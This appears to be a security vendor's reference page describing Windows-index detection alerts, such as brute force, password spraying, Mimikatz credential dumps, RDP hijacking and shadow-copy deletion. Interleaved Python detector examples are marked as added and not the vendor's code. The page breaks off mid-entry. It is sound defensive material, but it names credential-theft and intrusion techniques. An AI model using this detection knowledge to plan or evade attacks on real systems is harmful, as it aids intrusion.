Alert Types That Use the Windows Index
The Alert Types listed below use the Windows Index. For a list of Alert Types by each index or XDR Kill Chain stage, or for a general overview, refer to Machine Learning and Analytics Overview.
To minimize excessive alerting, each alert type is triggered only once in a 24-hour period for the set of attributes that triggered that specific alert.
Where applicable, the Tactics and Techniques are linked to the relevant MITRE | ATT&CK page.
Stellar Cyber also provides an interactive tool that lets you look up alert types by data source, alert name, event type, or source index.
- Abnormal Parent / Child Process
- Azure AD Apps Modified To Allow Multi-Tenant Access
- Azure AD Custom Domains Changed
- Backup Catalogs Deleted by Ransomware
- Bad Reputation Login
- Command Anomaly
- Encoded PowerShell
- External Account Login Failure Anomaly
- External Brute-Forced Successful User Login
- External Credential Stuffing
- External Password Spraying
- External RDP BlueKeep
- External RDP Suspicious Outbound
- External User Login Failure Anomaly
- Hydra Password Guessing Hack Tool
- Impossible Travel Anomaly
- Internal Account Login Failure Anomaly
- Internal Brute-Forced Successful User Login
- Internal Credential Stuffing
- Internal Password Spraying
- Internal RDP BlueKeep
- Internal RDP Suspicious Outbound
- Internal User Login Failure Anomaly
- Login Time Anomaly
- Malware on Disk
- Mimikatz Credential Dump
- Mimikatz DCSync
- Office 365 Access Governance Anomaly
- Office 365 Admin Audit Logging Disabled
- Office 365 Blocked User
- Office 365 Content Filter Policy Changed
- Office 365 Data Exfiltration Attempt Anomaly
- Office 365 Data Loss Prevention
- Office 365 File Sharing with Outside Entities
- Office 365 Malware Filter Policy Changed
- Office 365 Multiple Files Restored
- Office 365 Multiple Users Deleted
- Office 365 Network Security Configuration Changed
- Office 365 Password Policy Changed
- Office 365 Sharing Policy Changed
- Office 365 User Network Admin Changed
- Password Cracking with Hashcat
- Password Spraying Attempts with DSACLS
- Potentially Malicious Windows Event
- PowerShell Remote Access
- Process Anomaly
- RDP Port Opening
- RDP Registry Modification
- RDP Reverse Tunnel
- RDP Session Hijacking
- RDP Settings Hijacking
- RDP Suspicious Logon
- RDP Suspicious Logon Attempt
- Sensitive Windows Active Directory Attribute Modification
- Sensitive Windows Network Share File or Folder Accessed
- SMB Impacket Lateralization
- SMB Specific Service Installation
- SMB Suspicious Copy
- Suspicious Access Attempt to Windows Object
- Suspicious Activity Related to Security-Enabled Group
- Suspicious Connection to Another Process
- Suspicious Handle Request to Sensitive Object
- Suspicious Powershell Script
- Suspicious Process Creation Commandline
- Suspicious Windows Active Directory Operation
- Suspicious Windows Logon Event
- Suspicious Windows Process Creation
- Suspicious Windows Service Installation
- Uncommon Process Anomaly
- User Asset Access Anomaly
- User Login Location Anomaly
- User Process Usage Anomaly
- Volume Shadow Copy Deletion via VssAdmin
- Volume Shadow Copy Deletion via WMIC
Abnormal Parent / Child Process
A process that typically launches a small, consistent number of child processes launched a new child process. Investigate the child process to see if it is benign.
This alert type has two subtype categories:
Alert Subtype: Machine Learning Anomaly Detection
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: XDR EBA (XTA0001)
- Technique: XDR Process Relationship Anomaly (XT1002)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is parent_child.
Key Fields and Relevant Data Points
- parent_proc_name — name of the parent process
- srcip_host — host name of the corresponding source IP address
- process_name — name of the process
- stability — score measuring the time since the parent process launched the last child process
- diversity — score measuring the number of child processes that the parent process spawned
- days_stable — time since the parent process launched the last child process
- child_count — number of child processes that the parent process spawned
Use Case with Data Points
Each pair of parent/child processes (parent_proc_name and process_name) is examined periodically. If a parent process (parent_proc_name) that has a small number of child processes (diversity, child_count) and has not launched a new child process for a long time (stability, days_stable) launches a new child process (process_name) from a host (srcip_host), an alert is triggered.
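The baseline-and-compare logic described above, as an added Python example that is not Stellar Cyber's code: it tracks each parent's set of children and the time since its last new child, and alerts only when a low-diversity, long-stable parent spawns a child it never launched before. The thresholds, the stability/diversity score formulas and the record layout are assumptions.

```python
"""Simplified detector for the Abnormal Parent / Child Process alert.

Added example, not Stellar Cyber code. For each parent process it keeps the set
of child processes already seen (child_count) and the time at which the parent
last launched a new child (days_stable). When a parent with few children that
has been stable for a long time launches a child it never launched before, an
alert carrying the page's field names is produced. Thresholds and the
stability/diversity score formulas are assumptions.
"""
from datetime import datetime

MAX_CHILDREN = 3       # assumed meaning of "a small number of child processes"
MIN_STABLE_DAYS = 14   # assumed meaning of "has not launched a new child for a long time"


class ParentChildDetector:
    def __init__(self, max_children=MAX_CHILDREN, min_stable_days=MIN_STABLE_DAYS):
        self.max_children = max_children
        self.min_stable_days = min_stable_days
        self.children = {}         # parent_proc_name -> set of process_name seen so far
        self.last_new_child = {}   # parent_proc_name -> datetime a new child last appeared

    def observe(self, event):
        """Feed one process-creation record (in time order); return an alert or None."""
        ts = datetime.fromisoformat(event["ts"])
        parent, child, host = event["parent_proc_name"], event["process_name"], event["srcip_host"]
        known = self.children.setdefault(parent, set())
        if child in known:
            return None                          # established pair, nothing new to learn
        alert = None
        if parent in self.last_new_child:        # a parent seen for the first time only builds baseline
            days_stable = (ts - self.last_new_child[parent]).days
            child_count = len(known)
            if child_count <= self.max_children and days_stable >= self.min_stable_days:
                alert = {
                    "xdr_event.name": "parent_child",
                    "parent_proc_name": parent,
                    "process_name": child,
                    "srcip_host": host,
                    "child_count": child_count,
                    "days_stable": days_stable,
                    # assumed score formulas: both rise toward 1 as the pair looks more anomalous
                    "stability": days_stable / (days_stable + 1),
                    "diversity": 1 / (child_count + 1),
                }
        known.add(child)
        self.last_new_child[parent] = ts
        return alert


# Constructed process-creation records: (ts, srcip_host, parent_proc_name, process_name).
EVENTS = [
    ("2024-01-01T08:00:00", "ws-01", "winword.exe", "splwow64.exe"),
    ("2024-01-01T08:05:00", "ws-01", "explorer.exe", "chrome.exe"),
    ("2024-01-01T08:06:00", "ws-01", "explorer.exe", "outlook.exe"),
    ("2024-01-01T08:07:00", "ws-01", "explorer.exe", "teams.exe"),
    ("2024-01-01T08:08:00", "ws-01", "explorer.exe", "notepad.exe"),
    ("2024-01-02T09:15:00", "ws-01", "winword.exe", "splwow64.exe"),   # repeat of a known pair
    ("2024-01-03T10:00:00", "ws-02", "winword.exe", "wordicon.exe"),   # new child, but only 2 days stable
    ("2024-01-31T14:30:00", "ws-03", "winword.exe", "cmd.exe"),        # new child after 28 stable days
    ("2024-01-31T14:31:00", "ws-03", "explorer.exe", "cmd.exe"),       # diverse parent: no alert
    ("2024-01-31T15:00:00", "ws-03", "winword.exe", "cmd.exe"),        # now a known pair
]


def run(events):
    """Replay records in timestamp order and collect the alerts raised."""
    det = ParentChildDetector()
    alerts = []
    for ts, host, parent, child in sorted(events):
        alert = det.observe({"ts": ts, "srcip_host": host,
                             "parent_proc_name": parent, "process_name": child})
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run(EVENTS):
        print(a)
```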
Alert Subtype: Rule Based Detection
The Parent/Child Suspicious Process Creation rules are used to identify suspicious activity with parent/child relationships associated with process creation. Any one or more of these will trigger the Parent/Child Suspicious Process Creation alert types.
Key Fields and Relevant Data Points
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Parent/Child Suspicious Process Creation Alert Type
Azure AD Apps Modified To Allow Multi-Tenant Access
Azure AD detected an application being modified to allow multi-tenant access. Check with the organization to be sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Persistence (TA0003)
- Technique: Account Manipulation (T1098)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is azure_ad_add_app_multitenant.
Key Fields and Relevant Data Points
- srcip_usersid — user ID that made the property change
- activityDisplayName — description of the action
- targetResources.modifiedProperties.displayName — properties that were changed
Use Case with Data Points
If Azure AD detects any user (srcip_usersid) changing an application to allow multi-tenant access, an alert is triggered. A sample Interflow includes the user ID (srcip_usersid), activity name (activityDisplayName), and name of the changed property (targetResources.modifiedProperties.displayName).
Azure AD Custom Domains Changed
Azure AD detected a custom domain being changed. Check with the organization to be sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Domain Policy Modification (T1484)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is azure_ad_change_domain.
Key Fields and Relevant Data Points
- srcip_usersid — user account that made the domain change
- activityDisplayName — activity display name
- activity_name — action description
Use Case with Data Points
If Azure AD detects any user (srcip_usersid) changing a custom domain, an alert is triggered. A sample Interflow includes the user ID (srcip_usersid) and activity name (activity_name).
Backup Catalogs Deleted by Ransomware
The wbadmin.exe utility was used to delete the backup catalog. Ransomware and other malware do this to prevent system recovery. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Indicator Removal on Host (T1070)
- Tags: [Malware; Ransomware]
Event Name
The xdr_event.name for this alert type in the Interflow data is ransomware_delete_backup_catalogs.
Key Fields and Relevant Data Points
- hostip — IP address of the host executing the process
- process_name — name of the process
- event_data.CommandLine — command that was executed
Use Case with Data Points
If wbadmin.exe is used to delete the backup catalog, an alert is triggered. The Interflow includes the host IP address (hostip), process name (process_name), and command line (event_data.CommandLine).
Bad Reputation Login
A successful login was detected from an IP address with a history of malicious activity. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] XDR NBA (XTA0002)
- Technique: XDR Bad Reputation (XT2010)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is bad_reputation_login.
Key Fields and Relevant Data Points
- srcip — source IP address
- srcip_host — source host name
- srcip_reputation — source reputation
- source_geo.countryName — source country
- dstip_host — destination host name
- login_type — type of login
- username — user name
Use Case with Data Points
The login records are checked for every source IP address (srcip). If a source IP address has successful login records and its reputation (srcip_reputation) is bad (except brute-forcer and scanner), an alert is triggered. A sample Interflow includes the source IP address (srcip), source host (srcip_host), source reputation (srcip_reputation), source country (srcip_geo.countryName), login type (login_type), and user name (username).
Command Anomaly
A command has been executed an anomalously large number of times compared to its typical executions or those of other commands. Investigate the command and the user to determine if this is expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Execution (TA0002)
- Technique: Command and Scripting Interpreter (T1059)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is command_anomaly.
Key Fields and Relevant Data Points
- command — command executed
- actual — actual number of executions in the period
- typical — typical number of executions in the period
- cwd — current working directory from which the command was executed
- hostip — host running the agent sensor
- srcip — source IP address from which the command was run
- username — name of the user who ran the command
Use Case with Data Points
The number of times a command (command) has been executed is calculated periodically. If the volume (actual) is much larger than the typical volume (typical) of that command or of other commands in any period, an alert is triggered. The Interflow includes the directory from which the command was executed (cwd), the host and source IP addresses (hostip and srcip) from which the command was executed, and the name of the user who ran the command (username).
Encoded PowerShell
A Windows host executed an encoded PowerShell script. Investigate the script contents to see if it is malicious. If so, consider quarantining the host.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Execution (TA0002)
- Technique: Command and Scripting Interpreter (T1059)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is encoded_powershell.
Key Fields and Relevant Data Points
- srcip — source IP address
- event_data.ContextInfo — PowerShell script context
- event_data.Payload — PowerShell script payload
Use Case with Data Points
If a Windows host (srcip) executes a PowerShell script whose context (event_data.ContextInfo) includes flags that indicate encoding or obfuscation of the script, an alert is triggered. The Interflow includes the IP address of the Windows host (srcip), the script context (event_data.ContextInfo), and the script payload (event_data.Payload).
External Account Login Failure Anomaly
An anomalously large number of user login failures was observed for an account. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_cloud_account_login_failure.
Key Fields and Relevant Data Points
- srcip_usersid — cloud account user ID
- srcip_username — cloud account user name
- event_summary.total_failed — number of failed logins in the period
- event_summary.total_successful — number of successful logins in the period
- event_summary.total_fail_ratio — percent of failed logins in the period, which is event_summary.total_failed / (event_summary.total_failed + event_summary.total_successful)
- accumulated_anomalous_failures — score value of the model indicating the degree of abnormal activity
- srcip_host — host name of the corresponding source IP address
- login_type — type of login
- srcip_reputation — source reputation
Use Case with Data Points
Login failures and successes are calculated periodically for every account (srcip_usersid). If the number of failures is significantly larger than the number of successes, an alert is triggered. A sample Interflow includes the login type (login_type), source host (srcip_host), and source reputation (srcip_reputation).
Stellar Cyber reports both internal and external versions of some alerts, with different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound or outbound. Use the following as a guide for these concepts:
- Addresses with a srcip_type or dstip_type of private are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external).
- Communications between hosts where srcip_type and dstip_type are both private are considered internal communications.
- When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the srcip in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show the dstip as the source address and the srcip as the destination address, even though the srcip was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber's Interflow record of srcip and dstip to understand which address initiated the threat event.
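The scoping rules in the note above, as an added Python example that is not Stellar Cyber code: it classifies a record as internal or external from srcip_type/dstip_type and shows how an IDS signature's source/destination can differ from the Interflow initiator. The record layout, and the reading that an INBOUND flow runs from the non-private address toward the private one, are assumptions.

```python
"""Internal/external scoping and IDS direction resolution for one Interflow record.

Added example, not Stellar Cyber code. It encodes the rules in the note above:
an address whose *_type is "private" is internal; a communication is internal
only when both ends are private, and an anomaly on it is an internal attack;
srcip is always the initiator; an IDS signature's source/destination follow the
data flow direction. The record layout and the assumption that an INBOUND flow
runs from the non-private address toward the private one are mine.
"""

PRIVATE = "private"


def scope_of(ip_type):
    """srcip_type/dstip_type of "private" is internal; any other value is external."""
    return "internal" if ip_type == PRIVATE else "external"


def signature_endpoints(rec, direction):
    """Return (signature_source, signature_destination) for an IDS hit on this record.

    The IDS names the sender of the flow as the source. With one private and
    one non-private end, INBOUND means the non-private address is sending
    (assumption), so the initiator (srcip) may appear as the destination.
    """
    private_ends = {rec["srcip_type"] == PRIVATE, rec["dstip_type"] == PRIVATE}
    if private_ends != {True, False}:
        return None   # both private or both public: direction alone cannot place the ends
    external_ip = rec["srcip"] if rec["srcip_type"] != PRIVATE else rec["dstip"]
    internal_ip = rec["dstip"] if external_ip == rec["srcip"] else rec["srcip"]
    if direction == "INBOUND":
        return external_ip, internal_ip
    if direction == "OUTBOUND":
        return internal_ip, external_ip
    raise ValueError(f"unknown direction {direction!r}")


def classify(rec, ids_direction=None):
    """Summarise scope, initiator, and how an IDS signature would label the ends."""
    internal_comm = rec["srcip_type"] == PRIVATE and rec["dstip_type"] == PRIVATE
    out = {
        "srcip_scope": scope_of(rec["srcip_type"]),
        "dstip_scope": scope_of(rec["dstip_type"]),
        "communication": "internal" if internal_comm else "external",
        "attack_scope": "internal" if internal_comm else "external",
        "initiator": rec["srcip"],   # Interflow always records the initiator as srcip
    }
    if ids_direction:
        ends = signature_endpoints(rec, ids_direction)
        out["signature_source"], out["signature_destination"] = ends if ends else (None, None)
    return out


# Constructed record: an internal host initiates a request to a public address,
# and the IDS fires on the INBOUND reply traffic.
RECORD = {"srcip": "10.1.2.3", "srcip_type": "private",
          "dstip": "198.51.100.10", "dstip_type": "public"}

if __name__ == "__main__":
    print(classify(RECORD, "INBOUND"))
```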
External Brute-Forced Successful User Login
A successful login was observed from an IP address that had previously seen a large number of login failures, or a successful login to a user account was observed from another IP address or IP addresses that had previously seen a large number of login failures to that account. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
This alert type has two subtypes, source IP-based and user ID-based, described below.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_user_success_brute_forcer.
Alert Subtype: Source IP-Based
The source IP-based alert subtype has the same XDR Kill Chain and Event Name as the user ID-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
- srcip — source IP address
- srcip_usersid — Windows SID associated with the source IP address
- srcip_host — source host name
- srcip_reputation — source reputation
- source_geo.countryName — source country
- dstip_host — destination host name
- login_type — type of login
- username — user name
- related_alert._id — link to the related External User Login Failure Anomaly
Use Case with Data Points
The login records are checked for every external source IP address (srcip). An alert is triggered if that IP address:
- Has so many failed login attempts that it triggered the External User Login Failure Anomaly, and
- Had a successful login
A sample Interflow includes the source IP address (srcip), login type (login_type), source host (srcip_host), source reputation (srcip_reputation), source country (srcip_geo.countryName), and user name (username).
Alert Subtype: User ID-Based
The user ID-based alert subtype has the same XDR Kill Chain and Event Name as the source IP-based alert subtype, but differs in the Key Fields and Relevant Data Points and Use Case with Data Points.
Key Fields and Relevant Data Points
- srcip_usersid — Windows SID associated with the source IP address
- srcip — source IP address
- srcip_host — source host name
- srcip_reputation — source reputation
- source_geo.countryName — source country
- dstip_host — destination host name
- login_type — type of login
- username — user name
- related_alert._id — link to the related External Account Login Failure Anomaly
Use Case with Data Points
The login records to a user account (srcip_usersid) are checked for every external source IP address (srcip). An alert is triggered if that user account:
- Has so many failed login attempts that it triggered the External Account Login Failure Anomaly, and
- Had a successful login
A sample Interflow includes the source IP address (srcip), login type (login_type), source host (srcip_host), source reputation (srcip_reputation), source country (srcip_geo.countryName), and user name (username).
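Both subtypes, together with the failure anomalies they depend on (External Account Login Failure Anomaly above and External User Login Failure Anomaly described elsewhere on this page), as one added Python example that is not Stellar Cyber code: running counters per srcip or per srcip_usersid raise the failure anomaly once failures clearly outnumber successes, and a later success for the same key raises the brute-forced-success alert with related_alert._id pointing at it. Thresholds, the record layout (an account name stands in for the SID) and the _id scheme are assumptions.

```python
"""Login-failure anomaly with brute-forced-success correlation.

Added example, not Stellar Cyber code. It models, in simplified form, the
External User Login Failure Anomaly / External Account Login Failure Anomaly
(failures significantly outnumber successes for a key) and the External
Brute-Forced Successful User Login alert (a later success for a key that has
already raised the failure anomaly, linked through related_alert._id). key is
"srcip" for the source IP-based subtype and "srcip_usersid" for the user
ID-based subtype. Thresholds, record layout and the _id scheme are assumptions.
"""
from collections import defaultdict
import itertools

MIN_FAILURES = 10   # assumed: failures needed before the ratio is considered
FAIL_RATIO = 0.8    # assumed: "failures significantly larger than successes"

FAILURE_EVENT = {"srcip": "external_user_login_fail",
                 "srcip_usersid": "external_cloud_account_login_failure"}


def fail_ratio(total_failed, total_successful):
    """event_summary.total_fail_ratio as defined on the page."""
    total = total_failed + total_successful
    return total_failed / total if total else 0.0


def detect(events, key):
    """Replay login events in time order; return the alerts raised, in order."""
    ids = itertools.count(1)
    summary = defaultdict(lambda: {"total_failed": 0, "total_successful": 0,
                                   "total_fail_ratio": 0.0})
    failure_alert_for = {}    # key value -> _id of its failure anomaly alert
    success_reported = set()  # keys whose brute-forced success was already alerted
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        k = ev[key]
        s = summary[k]
        s["total_successful" if ev["success"] else "total_failed"] += 1
        s["total_fail_ratio"] = fail_ratio(s["total_failed"], s["total_successful"])
        if not ev["success"]:
            if (k not in failure_alert_for and s["total_failed"] >= MIN_FAILURES
                    and s["total_fail_ratio"] >= FAIL_RATIO):
                alert = {"_id": next(ids), "xdr_event.name": FAILURE_EVENT[key],
                         key: k, "login_type": ev["login_type"],
                         "event_summary": dict(s)}
                alerts.append(alert)
                failure_alert_for[k] = alert["_id"]
        elif k in failure_alert_for and k not in success_reported:
            # "Has so many failed login attempts that it triggered the failure
            # anomaly, and had a successful login"
            alerts.append({"_id": next(ids),
                           "xdr_event.name": "external_user_success_brute_forcer",
                           "srcip": ev["srcip"], "srcip_usersid": ev["srcip_usersid"],
                           "username": ev["srcip_usersid"], "login_type": ev["login_type"],
                           "related_alert._id": failure_alert_for[k]})
            success_reported.add(k)
    return alerts


def _ev(minute, srcip, user, success):
    """Constructed login record; all timestamps fall within one morning hour."""
    return {"ts": f"2024-03-01T09:{minute:02d}:00", "srcip": srcip, "srcip_usersid": user,
            "dstip": "10.0.0.5", "login_type": "windows_logon", "success": success}


# Constructed stream: one IP hammering alice and then logging in; a normal user
# with a couple of typos; bob failed from many IPs (one each) and then logged in.
EVENTS = (
    [_ev(m, "203.0.113.7", "alice", False) for m in range(0, 12)]
    + [_ev(12, "203.0.113.7", "alice", True)]
    + [_ev(m, "198.51.100.5", "carol", m % 4 != 0) for m in range(0, 8)]
    + [_ev(m, f"192.0.2.{m}", "bob", False) for m in range(20, 31)]
    + [_ev(31, "192.0.2.99", "bob", True)]
)

if __name__ == "__main__":
    for k in ("srcip", "srcip_usersid"):
        print(k, [(a["xdr_event.name"], a.get("related_alert._id")) for a in detect(EVENTS, k)])
```

Keyed by srcip the stream yields two alerts (the hammering IP only); keyed by srcip_usersid it yields four, because bob's failures spread across many IPs only stand out when counted per account.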
External Credential Stuffing
An anomalously large amount of username/password testing was detected on AWS, Okta, or Windows. Check the activity after successful logins, and consider blocking the source IP addresses.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_credential_stuffing.
Key Fields and Relevant Data Points
- msg_class — name of the service: cloudtrail for AWS, okta for Okta, Microsoft-Windows-Security-Auditing for Windows
- service_id — specific account ID of a service
- login_failure_rate — rate of login failures per minute in the period
- unknown_users_rate — rate of unknown user names per minute in the period
- unknown_users_to_login_failures — ratio of unknown user names to login failures in the period
- suspicious_ips — suspicious source IP addresses (up to 100)
- possible_breached_ips — list of malicious IPs that may have successful breach activities
Use Case with Data Points
External credential stuffing is the constant testing of username/password combinations against the AWS, Okta, or Windows authentication functions. Login activity is monitored, and if the number of failed logins is larger than normal for that service, an alert is triggered. The Interflow includes the service (msg_class), the tenant's account ID on that service (service_id), suspicious source IP addresses (suspicious_ips), login failure rate (login_failure_rate), unknown user rate (unknown_users_rate), the ratio of unknown users to login failures (unknown_users_to_login_failures), and a list of source IP addresses that might have suspicious activities and should be investigated (possible_breached_ips).
External Password Spraying
An anomalously large number of failed logins with unknown user names was observed on external Windows authentication services. Check the activity after successful logins, and consider blocking the source IP addresses.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Sub-technique: Password Spraying (T1110.003)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_password_spray.
Key Fields and Relevant Data Points
- srcip — source IP address generating a failed login, or
- event_data.Workstation — workstation causing the alert. The key field for this alert type can be either srcip or event_data.Workstation, depending on the data feed.
- event_id — Windows event ID corresponding to the login failure
- login_type — type of login; the available values vary by event_id
- actual — actual number of failed logins with unknown user names in a 5-minute period
- typical — typical number of failed logins with unknown user names in a 5-minute period
- password_spray_user_summary — list of up to 100 unknown user names associated with the failed logins (the first three are shown in the alert description)
Use Case with Data Points
If a potential password spraying attack is observed, an alert is triggered. The Interflow includes a source (srcip or event_data.Workstation), timestamp, the type of login (login_type), the number of failed logins (actual), the usual number of failed logins (typical), and a sampling of the user names used in the attack (password_spray_user_summary).
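The 5-minute actual-versus-typical comparison described above, as an added Python example that is not Stellar Cyber code, run over constructed Windows 4625 records: only failures whose SubStatus marks the user name as unknown are counted, the key field falls back from srcip to event_data.Workstation, and the alert carries password_spray_user_summary with its first three names split out for the description. The baseline formula, thresholds and record layout are assumptions.

```python
"""Simplified detector for the External Password Spraying alert.

Added example, not Stellar Cyber code. Windows 4625 logon failures whose
SubStatus says the user name does not exist (0xC0000064) are counted per source
in 5-minute periods; the source is srcip when the feed has it, otherwise
event_data.Workstation. A period whose count (actual) is far above the source's
earlier periods (typical) raises an alert carrying up to 100 of the unknown
user names, with the first three pulled out for the description. The baseline
formula, thresholds and record layout are assumptions.
"""
from collections import defaultdict
from datetime import datetime

PERIOD_SECONDS = 300                    # the alert's 5-minute period
UNKNOWN_USER_SUBSTATUS = "0xC0000064"   # 4625 SubStatus: user name does not exist
MIN_ACTUAL = 10                         # assumed floor before a period can alert
SPIKE_FACTOR = 5                        # assumed: actual must be >= 5x typical
MAX_SUMMARY = 100


def source_of(ev):
    """Key field: srcip if the data feed provides it, else event_data.Workstation."""
    return ev.get("srcip") or ev["event_data"]["Workstation"]


def period_of(ts):
    """Start (epoch seconds) of the 5-minute period containing an ISO-8601 timestamp."""
    epoch = int(datetime.fromisoformat(ts).timestamp())
    return epoch - epoch % PERIOD_SECONDS


def detect_password_spray(events):
    """Return one alert per (source, period) whose unknown-user failures spike."""
    names_by_period = defaultdict(lambda: defaultdict(list))   # source -> period -> names
    login_type = {}
    for ev in events:
        if ev["event_id"] != 4625 or ev["event_data"].get("SubStatus") != UNKNOWN_USER_SUBSTATUS:
            continue   # successes and wrong-password failures for known users are ignored
        src = source_of(ev)
        names_by_period[src][period_of(ev["ts"])].append(ev["event_data"]["TargetUserName"])
        login_type[src] = ev["event_data"].get("LogonType")
    alerts = []
    for src, periods in names_by_period.items():
        history = []   # counts of this source's earlier periods, oldest first
        for start in sorted(periods):
            names = periods[start]
            actual = len(names)
            typical = sum(history) / len(history) if history else 0.0   # assumed baseline: mean
            history.append(actual)
            if actual >= MIN_ACTUAL and actual >= SPIKE_FACTOR * max(typical, 1.0):
                summary = list(dict.fromkeys(names))[:MAX_SUMMARY]   # unique, first-seen order
                alerts.append({
                    "xdr_event.name": "external_password_spray",
                    "source": src, "period_start": start, "event_id": 4625,
                    "login_type": login_type[src],
                    "actual": actual, "typical": typical,
                    "password_spray_user_summary": summary,
                    "description_users": summary[:3],
                })
    return alerts


def _fail(ts, user, substatus, srcip=None, workstation="WKS-EXT"):
    """Constructed 4625 record with the fields the detector reads."""
    return {"ts": ts, "event_id": 4625, "srcip": srcip,
            "event_data": {"TargetUserName": user, "SubStatus": substatus,
                           "Workstation": workstation, "LogonType": "3"}}


# Constructed stream: a public IP probes two unknown names per period, then
# sprays 40 distinct names in one period; a workstation where a user mistypes
# a known account's password (SubStatus 0xC000006A) is not counted.
EVENTS = (
    [_fail("2024-03-01T09:00:10+00:00", "svc_old", UNKNOWN_USER_SUBSTATUS, "203.0.113.9"),
     _fail("2024-03-01T09:03:00+00:00", "jsmith2", UNKNOWN_USER_SUBSTATUS, "203.0.113.9"),
     _fail("2024-03-01T09:06:00+00:00", "admin1", UNKNOWN_USER_SUBSTATUS, "203.0.113.9"),
     _fail("2024-03-01T09:08:00+00:00", "test", UNKNOWN_USER_SUBSTATUS, "203.0.113.9")]
    + [_fail(f"2024-03-01T09:1{i // 10}:{i % 10 * 6:02d}+00:00", f"user{i:03d}",
             UNKNOWN_USER_SUBSTATUS, "203.0.113.9") for i in range(40)]
    + [_fail(f"2024-03-01T09:1{i}:30+00:00", "alice", "0xC000006A", None, "WKS-FIN-07")
       for i in range(3)]
)

if __name__ == "__main__":
    for a in detect_password_spray(EVENTS):
        print(a["source"], a["actual"], a["typical"], a["description_users"])
```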
External RDP BlueKeep
Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to BlueKeep (CVE-2019-0708). Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [External] Privilege Escalation (TA0004)
- Technique: Exploitation for Privilege Escalation (T1068)
- Tags: [External; RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_rdp_bluekeep.
Key Fields and Relevant Data Points
- ids.signature — IDS signature
- srcip_host — source host name
- dstip_host — destination host name
Use Case with Data Points
If the scanner by zerosum0x0 is used, an alert is triggered. A sample Interflow includes the IDS signature (ids.signature), source host (srcip_host), and destination host (dstip_host).
External RDP Suspicious Outbound
Non-standard tools connecting to TCP port 3389 were detected. This could indicate lateral movement attempting to establish an RDP connection. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] XDR NBA (XTA0002)
- Technique: XDR App Anomaly (XT2003)
- Tags: [External; RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_rdp_suspicious_outbound.
Key Fields and Relevant Data Points
- srcip — source IP address of the host that connects to TCP port 3389 with a non-standard tool
- srcip_host — source host name
- process_name — process name
Use Case with Data Points
Connections to TCP port 3389 are monitored, and if non-standard tools connect, an alert is triggered. A sample Interflow includes the source IP address (srcip) and the process name (process_name). The following are the standard tools:
- mstsc.exe
- RTSApp.exe
- RTS2App.exe
- RDCMan.exe
- ws_TunnelService.exe
- RSSensor.exe
- RemoteDesktopManagerFree.exe
- RemoteDesktopManager.exe
- RemoteDesktopManager64.exe
- mRemoteNG.exe
- mRemote.exe
- Terminals.exe
- spiceworks-finder.exe
- FSDiscovery.exe
- FSAssessment.exe
- MobaRTE.exe
- chrome.exe
- thor.exe
- thor64.exe
External User Login Failure Anomaly
An anomalous number of login failures was observed for one of the following applications: SSH, SMTP, FTP, RDP, SMB, databases, Active Directory, Office 365, Okta, AWS CloudTrail, or Google Workspace. For Okta, an anomalous number of multi-factor authentication (MFA) failures was observed. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is external_user_login_fail.
Key Fields and Relevant Data Points
- srcip — source IP address
- dstip — destination IP address
- dstip_host — destination host name
